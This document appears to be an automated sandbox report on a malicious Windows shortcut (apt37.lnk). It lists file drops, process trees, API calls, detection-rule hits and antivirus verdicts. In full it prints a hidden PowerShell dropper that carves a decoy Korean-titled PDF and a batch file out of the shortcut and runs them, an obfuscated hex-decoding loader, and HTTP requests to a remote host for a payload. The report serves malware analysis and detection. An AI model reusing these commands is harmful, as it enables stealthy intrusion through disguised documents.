file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\Users\test22\AppData\Local\Temp\apt37.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
cmdline powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
cmdline C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$ts[...]rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
cmdline powershell -windowstyle hidden -command "$ts[...]rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
file C:\Users\test22\AppData\Local\Temp\mimxjfes.dll
file C:\Users\test22\AppData\Local\Temp\ojtnpej4.dll
file C:\Users\test22\AppData\Local\Temp\td2iyjiy.dll
file C:\Users\test22\AppData\Local\Temp\8ax4pzbz.dll
file C:\Users\test22\AppData\Local\Temp\v-jjopqs.dll
file C:\Users\test22\AppData\Local\Temp\hawz4wth.dll
file C:\Users\test22\AppData\Local\Temp\pfywdxbj.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2212
thread_handle: 0x00000338
process_identifier: 2216
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000340
1 1 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x00000084
process_identifier: 2260
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2792
thread_handle: 0x00000088
process_identifier: 2804
current_directory:
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$ts[...]rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2328
thread_handle: 0x00000084
process_identifier: 1916
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "$ts[...]rd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:50:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:04 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data received HTTP/1.1 404 Not Found Date: Thu, 25 May 2023 01:51:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 289 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> <address>Apache/2.4.41 (Ubuntu) Server at vmi810830.contaboserver.net Port 80</address> </body></html>
Data sent GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive
Data sent GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeAssignPrimaryTokenPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeMachineAccountPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTcbPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeLoadDriverPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeBackupPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRemoteShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeEnableDelegationPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeManageVolumePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeCreateGlobalPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
Time & API Arguments Status Return Repeated

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x000001ec
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x80000002
key_handle: 0x00000200
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2952
process_handle: 0x0000045c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2952
process_handle: 0x0000045c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3052
process_handle: 0x0000045c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 3052
process_handle: 0x0000045c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2740
process_handle: 0x00000460
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2740
process_handle: 0x00000460
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2444
process_handle: 0x00000460
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2444
process_handle: 0x00000460
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2492
process_handle: 0x0000040c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2492
process_handle: 0x0000040c
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2516
process_handle: 0x0000040c
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 2516
process_handle: 0x0000040c
1 0 0
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk ^| where-object {$_.length -eq 0x0001673333} ^| Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP ^| select -Skip 004820)) -Encoding Byte; ^& $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 ^| select -Skip 01246865)) -Encoding Byte; ^& $Ok;
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\v-jjopqs.cmdline"
cmdline powershell -windowstyle hidden $Km1W = Get-Location;if($Km1W -Match 'System32' -or $Km1W -Match 'Program Files') {$Km1W = 'C:\Users\test22\AppData\Local\Temp'};$VdP = Get-ChildItem -Path $Km1W -Recurse *.lnk | where-object {$_.length -eq 0x0001673333} | Select-Object -ExpandProperty FullName;$AxP = gc $VdP -Encoding Byte -TotalCount 001246435 -ReadCount 001246435;$jLfF = 'C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf';sc $jLfF ([byte[]]($AxP | select -Skip 004820)) -Encoding Byte; & $jLfF;$k5 = gc $VdP -Encoding Byte -TotalCount 001251719 -ReadCount 001251719;$Ok = 'C:\Users\test22\AppData\Local\Temp\PMTRD.bat';sc $Ok ([byte[]]($k5 | select -Skip 01246865)) -Encoding Byte; & $Ok;
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mimxjfes.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hawz4wth.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8ax4pzbz.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\td2iyjiy.cmdline"
cmdline "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\pfywdxbj.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ojtnpej4.cmdline"
file C:\Users\test22\AppData\Local\Temp\RES6103.tmp
file c:\Users\test22\AppData\Local\Temp\CSC60F2.tmp
Time & API Arguments Status Return Repeated

send

buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net Connection: Keep-Alive
socket: 1384
sent: 155
1 155 0

send

buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
socket: 1384
sent: 131
1 131 0

send

buffer: GET /local/cache-js/f93754e660802d7cc70924cceb4738ef.gz HTTP/1.1 User-Agent: connnecting... Host: vmi810830.contaboserver.net
socket: 1384
sent: 131
1 131 0
parent_process acrord32.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --locale=ko-kr --backgroundcolor=16514043
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\PMTRD.bat"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf
parent_process powershell.exe martian_process "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\test22\AppData\Local\Temp\정책연구브리핑 22-15 미ㆍ중 갈등시대 중국의 통상전략 변화와 시사점.pdf"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\v-jjopqs.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hawz4wth.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8ax4pzbz.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\pfywdxbj.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\td2iyjiy.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ojtnpej4.cmdline"
parent_process powershell.exe martian_process "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mimxjfes.cmdline"
Process injection Process 3008 resumed a thread in remote process 2216
Process injection Process 376 resumed a thread in remote process 2804
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2216
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2804
1 0 0
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
option -windowstyle hidden value Attempts to execute command with a hidden window
count 5036 name heapspray process powershell.exe total_mb 314 length 65536 protection PAGE_READWRITE
count 672 name heapspray process powershell.exe total_mb 81 length 126976 protection PAGE_READWRITE
count 375 name heapspray process powershell.exe total_mb 86 length 241664 protection PAGE_READWRITE
Lionic Trojan.WinLNK.Powecod.4!c
MicroWorld-eScan Heur.BZC.YAX.Boxter.949.9CCAC93A
CAT-QuickHeal Lnk.trojan.A7801312
Sangfor Trojan.Generic-LNK.Save.e2d78363
Cyren LNK/ABRisk.OJXI-2
Symantec Trojan.Gen.NPE.C
ESET-NOD32 a variant of Generik.FRSQUHI
Avast Other:Malware-gen [Trj]
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
BitDefender Heur.BZC.YAX.Boxter.949.9CCAC93A
Emsisoft Heur.BZC.YAX.Boxter.949.9CCAC93A (B)
DrWeb Trojan.MulDrop22.5278
VIPRE Heur.BZC.YAX.Boxter.949.9CCAC93A
FireEye Heur.BZC.YAX.Boxter.949.9CCAC93A
Sophos Troj/LnkDrop-M
SentinelOne Static AI - Suspicious LNK
GData Heur.BZC.YAX.Boxter.949.9CCAC93A
Arcabit Heur.BZC.YAX.Boxter.949.9CCAC93A
ZoneAlarm HEUR:Trojan.WinLNK.Powecod.c
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 LNK/Autorun.Gen
ALYac Heur.BZC.YAX.Boxter.949.9CCAC93A
MAX malware (ai score=87)
VBA32 Trojan.Link.Crafted
Ikarus BZC.YAX.Boxter
AVG Other:Malware-gen [Trj]
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe